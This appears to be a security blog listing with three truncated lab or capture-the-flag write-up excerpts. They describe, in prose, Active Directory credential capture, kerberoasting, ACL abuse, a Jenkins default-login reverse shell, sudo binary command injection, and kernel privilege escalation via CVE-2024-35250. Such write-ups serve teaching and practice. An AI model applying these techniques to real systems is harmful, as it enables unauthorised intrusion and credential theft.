hacksmarter

Starting with just an open web server, I harvested potential users from the City Council portal using a quick curl | html2text command. The real breakthrough came when I downloaded a .bin application from the site—it was authenticating to the domain controller right in front of me. By spoofing the DC’s hostname locally and listening on port 389, I captured credentials for svc_services_portal. From there, it was classic AD attacks: kerberoasting got me clerk.john, who had write access to an Uploads share. Deploying the slinky module triggered NTLM authentication from jon.peters, whose cracked credentials revealed GenericWrite privileges over three users. Targeted kerberoasting of those users cracked passwords for nina.soto, who could read the Backups share. Inside .wim profile backups, I found DPAPI-protected credentials—decrypted to reveal emma.hayes with powerful ACL controls. Critical clue: Buried inside sam.brooks profile backup was an email (message_sam.eml) warning that...

These pair of machines was pretty fun. Starting off on a ubuntu machine with just 2 ports open. Scanning shows port 8080 and when viewing this in a browser shows its running Jenkins and with a flick of the wrist, using admin:admin gets in the door. From here we can go to /script and use groovy or, you can create and build. Using a little reverse shell gets us on the machine after building. From user jenkins, we enumerate to find some binaries set with the sticky bit, as well as it requires no password for us from viewing our privileges using sudo. Coming to find a binary called router_config, we get this back to our machine and look at it with strings. Finding its not a complicated binary but uses puts as a function, nevertheless, looking at how it works left room to play as it didn’t sanitize any input. So simply running a little hello world, works to show we can run a command and get root on this system. From root, we find a keytab find only holding the AES-256 hash for...

This Active Directory machine starts off with ZERO CREDENTIALS. So our initial scan shows us normal ports open for a server. We first check SMB to find we have guest auth to a ‘Share’ directory. We have READ,WRITE to the directory. So after uploading a lnk file we capture the hash for bob.ross. Once a bloodhound dump is obtained, we find we have GenericAll to user alice.wonderland. We can do this a couple ways with entail setting a SPN and TargetedKerberoasting or change her password. This user alice.wonderland has access to the box being in Remote Management Users. After poking around some we find a SQL directory at C:\ but no access. Nevertheless, this is a older Windows Machine (Server 2022). Using CVE-2024-35250 to exploit at the kernel level we are able to obtain SYSTEM using msfconsole. Initial Scan12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970PORT STATE SERVICE REASON ...